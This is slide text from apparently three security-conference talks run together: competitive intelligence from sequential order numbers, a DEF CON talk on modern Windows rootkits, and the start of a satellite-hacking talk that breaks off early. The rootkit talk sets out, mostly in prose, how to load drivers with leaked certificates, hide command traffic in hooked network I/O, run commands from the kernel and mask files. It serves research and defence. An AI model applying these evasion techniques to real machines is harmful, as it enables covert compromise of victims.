patterns can be tied to other events APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there With this meta data: 1.) Caller relationships are established 2.) These relationships can be profiled 3.) Anomalies and outliers are identified 4.) “Burner phones” are identified 5.) Phone patterns can be tied to other events APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there With this meta data: 1.) Caller relationships are established 2.) These relationships can be profiled 3.) Anomalies and outliers are identified 4.) “Burner phones” are identified 5.) Phone patterns can be tied to other events APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there With this meta data: 1.) Caller relationships are established 2.) These relationships can be profiled 3.) Anomalies and outliers are identified 4.) “Burner phones” are identified 5.) Phone patterns can be tied to other events APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there The phone meta data is richer than the actual phone conversations But the meta data needs to be created. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Practical competitive intelligence APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there OPSEC A reviewal of day-to-day operations, to see what intelligence an advisory can collect. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there EMPLOYMENT POSTINGS OPSEC APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there SOCIAL MEDIA EMPLOYMENT POSTINGS OPSEC APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there SOCIAL MEDIA EMPLOYMENT POSTINGS ORDER FULFILLMENT OPSEC APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there SOCIAL MEDIA EMPLOYMENT POSTINGS ONLINE STORE ORDER FULFILLMENT OPSEC APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there SOCIAL MEDIA EMPLOYMENT POSTINGS ONLINE STORE ORDER FULFILLMENT OPSEC PROCUREMENT APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there SOCIAL MEDIA EMPLOYMENT POSTINGS REGULATORY ONLINE STORE ORDER FULFILLMENT OPSEC PROCUREMENT APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there SOCIAL MEDIA EMPLOYMENT POSTINGS REGULATORY ONLINE STORE ORDER FULFILLMENT OPSEC COMPETITIVE INTELLIGENCE PROCUREMENT Sequential numbers are a major privacy threat APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Sequential Numbers Sequential Numbers are everywhere Vehicle Identification Numbers Social Security Numbers Ticket Numbers In most cases, what's needed are unique numbers, not sequential numbers. Often caused by exposing DB table indexes APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there To show the power of sequential numbers... I'm going to tell you how the Social Security Administration nearly exposed an entire generation to identity fraud. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there SSN coding 1935 through 1972 XXX – XX – XXXX AREA GROUP SERIAL Area State, Territory or US possession (range) Group Used for administration purposes Serial Sequential (with a few exceptions) http://www.ssa.gov/policy/docs/ssb/v45n11/v45n11p29.pdf APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there XXX1 SSA These people have sequential SSNs Applying for cards, 1932 - 1972 XXX2 Age 14 Age 15 APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there XXX1 SSA These people have sequential SSNs Applying for cards, 1932 - 1972 XXX2 Age 14 Age 15 This process changed In 1972 The last for digits were no longer sequential APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Parents needed SSNs for all dependents Tax Reform Act of 1986 APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there XXX1 XXX2 XXX3 SSA These children would have sequential Social Security Numbers If sequential numbers were still used in the '80s Needs SSNs for children to declare as dependents APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How we use sequential numbers in our business Did we start our business at the height of a bubble? Channel Sales APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Bubble or just a bad month? APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there 1.) We noticed that order numbers were incremental 2.) We found two orders, placed closely together, had SEQUETIAL order numbers APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Bubble or just a bad month? 1.) We noticed that order numbers were incremental 2.) We found two orders, placed closely together, had SEQUETIAL order numbers APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Bubble or just a bad month? Last Order# Oct: 763736 Last Order# Sep: -757225 Qty Oct orders (est) 6511 1.) Our average order was $12.48 2.) Determined our orders were typical Average Sale: $12.48 Estimated July orders x 6511 Gross Channel Sales $81,257.28 APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Last Order# Oct: 763736 Last Order# Sep: -757225 Qty Oct orders (est) 6511 1.) Our average order was $12.48 2.) Determined our orders were typical Average Sale: $12.48 Estimated July orders x 6511 Gross Channel Sales $81,257.28 APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Last Order# Oct: 763736 Last Order# Sep: -757225 Qty Oct orders (est) 6511 1.) Our average order was $12.48 2.) Determined our orders were typical Average Sale: $12.48 Estimated July orders x 6511 Gross Channel Sales $81,257.28 APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Total Channel Sales APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Total Channel Sales APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What else can we learn? 1.) What else do we know? 2.) Channel commission is ~ 20% 3.) They keep $1.25 of the postage they collect. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What else can we learn? 1.) What else do we know? 2.) Channel commission is ~ 20% 3.) They keep $1.25 of the postage they collect. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What else can we learn? 1.) What else do we know? 2.) Channel commission is ~ 20% 3.) They keep $1.25 of the postage they collect. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Here is how much the website earns in commissions each month APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What else can we learn? 1.) What else do we know? 2.) Channel commission is ~ 20% 3.) They keep $1.25 of the postage they collect. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What else can we learn? Avg Monthly profit: $23913.22 Est Annual profit: $286958.58 APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What else can we learn? Avg Monthly profit: $23913.22 Est Annual profit: $286958.58 This is probably information They'd prefer not to share APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How do we buy inventory There are websites where we buy APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How do we buy inventory There are websites where we buy We sell on multiple websites, but only one is “a true market” APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How do we buy inventory We look for items And prices here APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How do we buy inventory We look for items And prices here And compare those prices to the market value APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How do we buy inventory APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there There are major privacy issues for resellers that sell unique items APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Truly unique items: – Real estate – Vehicles – Original art Likely unique items: – First edition books – Autographed items – Most used items There are major privacy issues for resellers that sell unique items APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Truly unique items: – Real estate – Vehicles – Original art Likely unique items: – First edition books – Autographed items – Most used items There are major privacy issues for resellers that sell unique items APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What makes the best competitor the best? INVENTORY ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- Automatically collect the inventory of our top competitor APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there What makes the best competitor the best? INVENTORY ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- INVENTORY ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- ------------------- Meta data describing: What sold? How much? What didn't sell? Capture #1 Capture #2 APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Meta data describing: What sold? How much? How long? What didn't sell? Capture #1 INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Capture #2 INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Capture #3 INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Capture #4 INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Capture #5 INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Capture #6 INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Capture #7 INVENTORY -------------- -------------- -------------- -------------- -------------- -------------- Capture N What makes the best competitor the best? APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How do we protect our investments? ACME ITEM #1 #1 seller “A” $1.25 #2 seller “B” $1.25 #3 seller “C” $19.50 #4 seller “D” $20.05 #5 seller “E” $21.95 Search results for an item we sell Our price APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How do we protect our investments? ACME ITEM #1 #1 seller “A” $1.25 #2 seller “B” $1.25 #3 seller “C” $19.50 #4 seller “D” $20.05 #5 seller “E” $21.95 Search results for an item we sell Our price We immediately buy the under-priced items APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Follow me on Twitter @mgschrenk Watch defcon.org for updated slides @mgschrenk If you find this subject interesting... APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there @mgschrenk If you find this subject interesting... APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there If you find this subject interesting... @mgschrenk APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there If you find this subject interesting... @mgschrenk I'm doing a book signing @ No Starch booth in vendor area
Demystifying Modern Windows Rootkits Bill Demirkapi Independent Security Researcher 1 Demystifying Modern Windows Rootkits – DEF CON 28 Who Am I? ▪ 19 years old ▪ Sophomore at the Rochester Institute of Technology ▪ Windows Internals ▪ Mostly self-taught (with guidance) ▪ Strong “Game Hacking” background 2 Demystifying Modern Windows Rootkits – DEF CON 28 What Is This Talk About? In this talk, we’ll go over… ▪ Loading a rootkit. ▪ Communicating with a rootkit. ▪ Abusing legitimate network communications. ▪ An example rootkit I wrote and the design choices behind it. ▪ Executing commands from kernel. ▪ Tricks to cover up the filesystem trace of your rootkit. Demystifying Modern Windows Rootkits – DEF CON 28 3 Introduction to Windows Rootkits Demystifying Modern Windows Rootkits – DEF CON 28 4 Windows Rootkits: An Overview Why would you want to use a rootkit? ▪ Kernel drivers have significant access to the machine. ▪ Same privilege level as a typical kernel anti-virus. ▪ Less mitigations and security solutions targeting kernel malware. ▪ Anti-Virus often have less visibility into operations performed by kernel drivers. ▪ Kernel drivers are often ignored by anti-virus. Demystifying Modern Windows Rootkits – DEF CON 28 5 Example: Treatment by Anti-Virus Anti-virus tends to treat kernel drivers with significant trust compared to user-mode applications. Demystifying Modern Windows Rootkits – DEF CON 28 6 Excerpt from Carbon Black’s Process/Thread Handle callbacks Excerpt from Malwarebytes’ Process/Thread Handle callbacks Loading a Rootkit Demystifying Modern Windows Rootkits – DEF CON 28 7 Abuse Legitimate Drivers There are a lot of “vulnerable” drivers. With some reversing knowledge, finding a “0-day” in a driver can be trivial. Examples include… ▪ Capcom’s Anti-Cheat driver ▪ Intel’s NAL Driver ▪ Microsoft themselves! Demystifying Modern Windows Rootkits – DEF CON 28 8 Abuse Legitimate Drivers Using legitimate drivers has quite a few benefits too: ▪ You only need a few primitives to escalate privilege. ▪ Finding a “vulnerable” driver is relatively trivial (OEM Drivers ). ▪ Difficult to detect due to compatibility reasons. Demystifying Modern Windows Rootkits – DEF CON 28 9 Abuse Legitimate Drivers Abusing legitimate drivers comes with some strong drawbacks too… ▪ Major issue of compatibility across operating system versions depending on the primitives you have. ▪ Much more likely to run into stability issues. ▪ The last thing you want is your malware to BSOD a victim. Demystifying Modern Windows Rootkits – DEF CON 28 10 Just Buy a Certificate! For some red teamers, buying a legitimate code signing certificate might be a good option. ▪ Useful for targeted attacks. ▪ No stability concerns. But… ▪ Potentially reveals your identity. ▪ Can be blacklisted. Demystifying Modern Windows Rootkits – DEF CON 28 11 Abuse Leaked Certificates Instead of buying a certificate yourself, why not just use one from someone else? ▪ There are quite a few public leaked certificates available to download. ▪ Almost has all the benefits of buying one without deanonymization. But… ▪ The leaked certificate you use can be detected in the future. ▪ If the certificate was issued after July 29th, 2015, it won’t work on secure boot machines running certain versions of Windows 10. Demystifying Modern Windows Rootkits – DEF CON 28 12 Abuse Leaked Certificates In most cases, Windows doesn’t care if your driver has a certificate that has expired or was revoked. Demystifying Modern Windows Rootkits – DEF CON 28 13 Abuse Leaked Certificates Several leaked certificates are already publicly posted, but it’s not impossible to find your own. Demystifying Modern Windows Rootkits – DEF CON 28 14 Abuse Leaked Certificates Oh and the best part…. most of them are undetected by the bulk of AV: Demystifying Modern Windows Rootkits – DEF CON 28 15 Communicating with a Rootkit Demystifying Modern Windows Rootkits – DEF CON 28 16 Beacon Out to a C2 A tried and true method that comes with some downsides is to “call home”. ▪ Firewalls can block or flag outgoing requests to unknown/suspicious IP Addresses or ports. ▪ Advanced Network Inspection can catch some exfiltration techniques that try to “blend in with the noise”. Demystifying Modern Windows Rootkits – DEF CON 28 17 Open a Port Some malware takes the route that the C2 connects to the victim directly to control it. ▪ Relatively simple to setup. But… ▪ Could be blocked off by a firewall. ▪ Difficult to “blend in with the noise”. Demystifying Modern Windows Rootkits – DEF CON 28 18 Application Specific Hooking More advanced malware may opt to hook a specific application’s communication as a channel of communication. ▪ Difficult to detect, especially if using legitimate protocol. But… ▪ It’s not very flexible. ▪ A machine might not have that service exposed. Demystifying Modern Windows Rootkits – DEF CON 28 19 Choosing a Communication Method What I want… 1. Limited detection vectors. 2. Flexibility for various environments. My assumptions… 1. Victims machines will have some services exposed. 2. Inbound and outbound access may be monitored. Demystifying Modern Windows Rootkits – DEF CON 28 20 Choosing a Communication Method Application Specific Hooking was perfect for my needs, except for the flexibility. Is there anyway we could change Application Specific Hooking to where it isn’t dependent on any single application? Demystifying Modern Windows Rootkits – DEF CON 28 21 Abusing Legitimate Communication What if instead of hooking an application directly, we… ▪ Hook network communication, similar to tools like Wireshark. ▪ Place a special indicator in “malicious” packets, a “magic” constant. ▪ Send these “malicious” packets to legitimate ports on the victim machine. ▪ Search packets for this “magic” constant to pass on data to our malware. Demystifying Modern Windows Rootkits – DEF CON 28 22 Hooking the User-Mode Network Stack Demystifying Modern Windows Rootkits – DEF CON 28 23 Hooking the Windows Winsock Driver ▪ A significant amount of services on Windows can be found in user- mode, how can we globally intercept this traffic? ▪ Networking relating to WinSock is handled by Afd.sys, otherwise known as the “Ancillary Function Driver for WinSock”. ▪ Reversing a few functions in mswsock.dll revealed that a bulk of the communication was done through IOCTLs. If we could intercept these requests, we could snoop in on the data being received. Demystifying Modern Windows Rootkits – DEF CON 28 24 How Do Irps Know Where to Go? When you call NtDeviceIoControlFile on a file handle to a device, how does the kernel determine what function to call? Demystifying Modern Windows Rootkits – DEF CON 28 25 Standard Methods of Intercepting Irps There are a few ways we can intercept Irps, but let’s look at two common methods. 1. Replace the Major Function you’d like to hook in the driver’s object. 2. Perform a code hook directly on the dispatch handler. Demystifying Modern Windows Rootkits – DEF CON 28 26 Picking a method To pick the best method of hooking, here are a few common questions you should ask. ▪ How many detection vectors are you potentially exposed to? ▪ How "usable" is the method? ▪ How expensive would it be to detect the method? Demystifying Modern Windows Rootkits – DEF CON 28 27 Hook a Driver Object ▪ How many detection vectors are you potentially exposed to? ▪ Memory artifacts. ▪ How “usable” is the method? ▪ For stability, by replacing a single function with an interlocked exchange, this method should be stable. ▪ For compatibility, driver objects are well-documented and easy to find. ▪ How expensive would it be to detect the method? ▪ Inexpensive, all anti-virus would need to do is enumerate loaded drivers and check that the major functions are within the bounds of the driver. Demystifying Modern Windows Rootkits – DEF CON 28 28 Hook a Driver’s Dispatch Function ▪ How many detection vectors are you potentially exposed to? ▪ Memory artifacts. ▪ How “usable” is the method? ▪ Unless the function is exported, you will need to find the function yourself. ▪ Not all drivers are compatible with this method due to PatchGuard. ▪ HVCI incompatible. ▪ How expensive would it be to detect the method? ▪ Potentially inexpensive and several methods to detect hooking. Demystifying Modern Windows Rootkits – DEF CON 28 29 Hooking File Objects I wanted a method that was… ▪ Undocumented. ▪ Stable. ▪ Relatively expensive to detect. What if instead of hooking the original driver object, we hooked the file object instead? Demystifying Modern Windows Rootkits – DEF CON 28 30 How Do Irps Know Where to Go? typedef struct _FILE_OBJECT { CSHORT Type; CSHORT Size; PDEVICE_OBJECT DeviceObject; ... } FILE_OBJECT; Demystifying Modern Windows Rootkits – DEF CON 28 31 To retrieve the device associated with the Afd driver, the kernel calls IoGetRelatedDeviceObject. What’s stopping us from overwriting this pointer? Hooking File Objects What we can do is… 1. Create our own device object and driver object. 2. Patch our copy of the driver object. 3. Replace the DeviceObject pointer of our file object with our own device. Let’s talk about how we would go about doing this. Demystifying Modern Windows Rootkits – DEF CON 28 32 Hooking File Objects Let’s start by finding a file object to hook. We’re after handles to \Device\Afd, but how can we find these objects? Demystifying Modern Windows Rootkits – DEF CON 28 33 typedef enum _SYSTEM_INFORMATION_CLASS { ... SystemHandleInformation, ... } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; Hooking File Objects The SystemHandleInformation class allows us to query all handles on the system, including… ▪ The process ID the handle belongs to. ▪ The kernel pointer of the object associated with the handle. If we open the Afd device ourselves, we can easily recognize file objects that are for the Afd device. Demystifying Modern Windows Rootkits – DEF CON 28 34 Hooking File Objects Before we can overwrite the DeviceObject member, we need to create our fake objects first. Fortunately, the kernel exports the function it uses itself to create these objects. All we need to do is call ObCreateObject passing the IoDriverObjectType or IoDeviceObjectType to create our fake objects. We can copy the existing objects over to contain the same member values. Demystifying Modern Windows Rootkits – DEF CON 28 35 Hooking File Objects With our fake objects created, we’re almost ready to set the DeviceObject of the file object. First though, we need to hook our driver object. We can use the standard “Hook a Driver Object” method, except instead of performing it on the original driver object, we’ll use it on a fake driver object used exclusively for our hooks. Demystifying Modern Windows Rootkits – DEF CON 28 36 Hooking File Objects To prevent race conditions while replacing the device object member, the original device object we use inside of our hooked dispatch must be set at the same time we the DeviceObject member of the file object. To do this, simply perform an interlocked exchange of the original device object and the device object our hook uses. Demystifying Modern Windows Rootkits – DEF CON 28 37 Hooking File Objects Now that we’ve hooked the file object, there is not much work left. In our dispatch hook, we need to… 1. Check if we are hooking the MajorFunction being called. 1. If we are, call the hook function passing the original device object and original dispatch function for that MajorFunction. 2. Make sure to restore the original DeviceObject when the MajorFunction is IRP_MJ_CLEANUP. Demystifying Modern Windows Rootkits – DEF CON 28 38 Hooking File Objects ▪ How many detection vectors are you potentially exposed to? ▪ Memory artifacts. ▪ How “usable” is the method? ▪ Most of the functions we use are at least semi-documented and unlikely to change significantly. ▪ How expensive would it be to detect the method? ▪ Expensive, an anti-virus would have to replicate our hooking process and enumerate file objects to determine if the device/driver object was swapped. Demystifying Modern Windows Rootkits – DEF CON 28 39 How the Spectre Rootkit Abuses the User-Mode Network Stack Demystifying Modern Windows Rootkits – DEF CON 28 40 Abusing the Network Using the File Object hook, we can now intercept Irps to the Afd driver. This allows us to… ▪ Intercept all user-mode networking traffic. ▪ Send and receive our own data over any socket. Demystifying Modern Windows Rootkits – DEF CON 28 41 Abusing the Network To review, our existing plan is to… ▪ Hook network communication, similar to tools like Wireshark. ▪ Place a special indicator in “malicious” packets, a “magic” constant. ▪ Send these “malicious” packets to legitimate ports on the victim machine. ▪ Search packets for this “magic” constant to pass on data to our malware. How can we actually retrieve the content of packets that are received? Demystifying Modern Windows Rootkits – DEF CON 28 42 Abusing the Network For receive operations, an IOCTL with the code IOCTL_AFD_RECV is sent to the Afd driver. Here is the structure sent in the input buffer. Demystifying Modern Windows Rootkits – DEF CON 28 43 typedef struct _AFD_RECV_INFO { PAFD_WSABUF BufferArray; ULONG BufferCount; ULONG AfdFlags; ULONG TdiFlags; } AFD_RECV_INFO, * PAFD_RECV_INFO; typedef struct _AFD_WSABUF { UINT len; PCHAR buf; } AFD_WSABUF, * PAFD_WSABUF; Parsing Packets: Design Let’s talk about how the Spectre Rootkit was designed. Demystifying Modern Windows Rootkits – DEF CON 28 44 Spectre Rootkit Packet Structure Any prepended data Magic Constant Base Packet Structure Optional Custom Structure Any appended data Parsing Packets: Pre-Processing Here is the process used when the Spectre Rootkit receives a packet. Demystifying Modern Windows Rootkits – DEF CON 28 45 Parsing Packets: Processing Demystifying Modern Windows Rootkits – DEF CON 28 46 Before dispatching a packet, we need to create a complete packet. Packet Handlers Before we go any further, let’s talk about the concept of “Packet Handlers” in the Spectre Rootkit. Demystifying Modern Windows Rootkits – DEF CON 28 47 Packet Handlers An example of a packet handler included with the Spectre Rootkit is the PingPacketHandler. This handler is used to determine if a machine/port is infected. The incoming packet has no actual data, other than indicating its Type is a Ping. The handler responds to the client with an empty base packet with the Type set to Ping. Demystifying Modern Windows Rootkits – DEF CON 28 48 Parsing Packets: Dispatching Once a packet is completely populated, the “packet dispatcher” will… Here’s why the “packet dispatcher” is awesome: by passing a pointer to itself to the relevant packet handler, that packet handler can recursively dispatch a new packet! Demystifying Modern Windows Rootkits – DEF CON 28 49 Packet Handlers: XorPacketHandler The best way to explain the recursive nature of the “packet dispatcher” is through an example, such as the XorPacketHandler. The XorPacketHandler takes a XOR_PACKET structure: This XOR_PACKET does not actually perform a malicious operation. Instead, it acts as an encapsulating packet. Demystifying Modern Windows Rootkits – DEF CON 28 50 Packet Handlers: XorPacketHandler When the XorPacketHandler receives a packet, it will… 1. Use the XorKey to deobfuscate the XorContent. 2. Recursively dispatch the XorContent as a new packet. The model that the Spectre Rootkit uses allows you to create infinite layers of encapsulation. Demystifying Modern Windows Rootkits – DEF CON 28 51 Executing Commands Let’s take a look at how we can execute commands from our rootkit, a common feature seen in a variety of Windows malware. Before we get into starting a process from a kernel driver, it’s important to understand how we would execute commands from a user-mode context. Demystifying Modern Windows Rootkits – DEF CON 28 52 Executing Commands: User-mode Demystifying Modern Windows Rootkits – DEF CON 28 53 Executing Commands: Kernel-mode Let’s start by creating the pipes we need to obtain output. Here is what CreatePipe does in the background… Demystifying Modern Windows Rootkits – DEF CON 28 54 Executing Commands: Kernel-mode Now that we have pipes, we need to create the actual process. We’ll use ZwCreateUserProcess because that’s what kernelbase.dll uses itself to create processes. Let's start with the attribute list for the process. ▪ The most important attribute we have to set is the PsAttributeImageName attribute. This will specify the image file name for the new process. Demystifying Modern Windows Rootkits – DEF CON 28 55 Executing Commands: Kernel-mode Next, we have to fill out an RTL_USER_PROCESS_PARAMETERS structure for the process. In this structure, we need to set… 1. The window flags and the output handles to our pipes. 2. The current directory, the command line arguments, the process image path, and the default desktop name. Demystifying Modern Windows Rootkits – DEF CON 28 56 Executing Commands: Kernel-mode From there, all it takes is a call to ZwCreateUserProcess to start the process. Once the process has exited, similar to what we do in user-mode, we can call ZwReadFile to read the output from the unnamed pipe. Demystifying Modern Windows Rootkits – DEF CON 28 57 Hiding a Rootkit Demystifying Modern Windows Rootkits – DEF CON 28 58 Introduction to Mini-Filters Mini-filter drivers allow you to attach to volumes and intercept certain file I/O. This is performed by registering with the Filter Manager driver. Demystifying Modern Windows Rootkits – DEF CON 28 59 Source: Microsoft Docs Introduction to Mini-Filters Mini-filters can be useful to mask the presence of our rootkit on the filesystem. For example, a mini-filter can direct all file access for a certain file to another file. We can use this functionality to redirect access to our driver file to another legitimate driver. Demystifying Modern Windows Rootkits – DEF CON 28 60 Picking a method To pick the best method of hooking, here are a few common questions you should ask. ▪ How many detection vectors are you potentially exposed to? ▪ How "usable" is the method? ▪ How expensive would it be to detect the method? Demystifying Modern Windows Rootkits – DEF CON 28 61 Become a Mini-Filter The easiest way to abuse the functionality of a mini-filter is to become one yourself. Here are the minimum requirements for FltRegisterFilter: 1. Create [ServiceKey]\Instances 2. Create [ServiceKey]\Instances\[An instance name] 3. In [ServiceKey]\Instances add a “DefaultInstance” and set it to your instance name used in step 2. 4. In [ServiceKey]\Instances\[An instance name], add the “Altitude” and “Flags” values. Demystifying Modern Windows Rootkits – DEF CON 28 62 Become a Mini-Filter ▪ How many detection vectors are you potentially exposed to? ▪ Registry and memory artifacts. ▪ How “usable” is the method? ▪ No concerns from stability or usability, this is how other legitimate drivers register as mini-filters. ▪ How expensive would it be to detect the method? ▪ Inexpensive. Besides the registry artifacts, drivers that are registered as mini- filters can easily be enumerated through API such as FltEnumerateFilters. Demystifying Modern Windows Rootkits – DEF CON 28 63 Hook a Mini-Filter Another method is to simply hook an existing mini-filter. There are a couple of routes you could take. ▪ Code hook the callback for an existing filter. ▪ Overwrite the FLT_REGISTRATION structure before the victim driver uses it to have your own callback. ▪ DKOM an existing filter instance and replace the original callback with yours. Demystifying Modern Windows Rootkits – DEF CON 28 64 Hook a Mini-Filter: Code Hook One of the easiest way to intercept callbacks to an existing mini-filter is to simply perform a code hook. This can be as simple as a jmp hook, but it comes with quite a few drawbacks, similar to those we saw in an earlier section where we discussed intercepting Irps. Demystifying Modern Windows Rootkits – DEF CON 28 65 Hook a Mini-Filter: Code Hook ▪ How many detection vectors are you potentially exposed to? ▪ Memory artifacts. ▪ How “usable” is the method? ▪ Unless the function is exported, you will need to find the function yourself. ▪ Not all drivers are compatible with this method due to PatchGuard. ▪ HVCI incompatible. ▪ How expensive would it be to detect the method? ▪ Potentially inexpensive and several methods to detect hooking. Demystifying Modern Windows Rootkits – DEF CON 28 66 Hook a Mini-Filter: DKOM A semi-documented method of hooking an existing mini-filter is through DKOM. You can enumerate filters and instances through the documented APIs FltEnumerateFilters and FltEnumerateInstances. The function that gets called for a certain operation is specified in the CallbackNodes array in the FLT_INSTANCE structure. Demystifying Modern Windows Rootkits – DEF CON 28 67 Hook a Mini-Filter: DKOM ▪ The CallbackNodes array index is associated with the major function you’re hooking. Demystifying Modern Windows Rootkits – DEF CON 28 68 Hook a Mini-Filter: DKOM ▪ How many detection vectors are you potentially exposed to? ▪ Memory artifacts. ▪ How “usable” is the method? ▪ For stability, although obtaining a FLT_INSTANCE structure is documented, the FLT_INSTANCE structure itself is undocumented. ▪ How expensive would it be to detect the method? ▪ Inexpensive, an anti-virus would need to occasionally enumerate registered filters and their instances for hooks in the CallbackNodes array. Demystifying Modern Windows Rootkits – DEF CON 28 69 Example: Abusing a Mini-Filter Let’s say you want to protect a certain file, what’s an example of redirecting access to it? Demystifying Modern Windows Rootkits – DEF CON 28 70 Wrap Up Demystifying Modern Windows Rootkits – DEF CON 28 71 Thanks to... Alex Ionescu (@aionescu) ▪ Long-time mentor very experienced with Windows Internals. ReactOS ▪ A fantastic reference for undocumented functions and structures. Nemanja Mulasmajic (@0xNemi) and Vlad Ionescu (@ucsenoi) ▪ Helped review this presentation. Demystifying Modern Windows Rootkits – DEF CON 28 72 Contact / Questions Thanks for sticking around! Now is the time for any questions. Twitter @BillDemirkapi Blog https://billdemirkapi.me Spectre Rootkit https://github.com/D4stiny/spectre Demystifying Modern Windows Rootkits – DEF CON 28 73
Spread Spectrum Satcom Hacking Attacking the Globalstar Simplex Data Service Colby Moore @colbymoore - colby@synack.com Motivation • Satellite hacking talks never deliver • RF world largely neglected by hacker community • So much legacy tech in critical systems • Spark interest in satellite security research What are we going to learn? • Overview of basic RF signals and modulation • What is spread spectrum - how does it work and how do we work with it • Picking a target and reverse engineering it • Exploiting that target • Next steps Analog RF Modulation • Amplitude Modulation (AM) • Frequency Modulation (FM) Digital RF Modulation • Amplitude Shift Keying (ASK / OOK) • Frequency Shift Keying (FSK) • Phase Shift Keying (PSK) Spread Spectrum Modulation • What is Spread Spectrum Special? WiFi, Bluetooth, Most modern RF Communication Spread Spectrum Modulation • Frequency Hopping Spread Spectrum (FHSS) • Direct Sequence Spread Spectrum (DSSS) Selecting a Target • Consumer Accessible • Cheap • Popular • High Impact Introducing SPOT • SPOT • But wait… this tech is used… everywhere. Goldmine. Who uses it? • Flight Planning Services • Consumers • SCADA • Big Gas and Oil How does it work? • LEO non-geosynchronous Bend Pipe Architecture Intel Gathering • Google • FCC Database • Academic Papers • Integrator Spec Sheets Intel Gathering Continued • What we know: • PN = 255 Chip M-Sequence • 1.6xx ghz • 144 bit message Hardware and Validation • USRP B200 • GQRX • GNURADIO 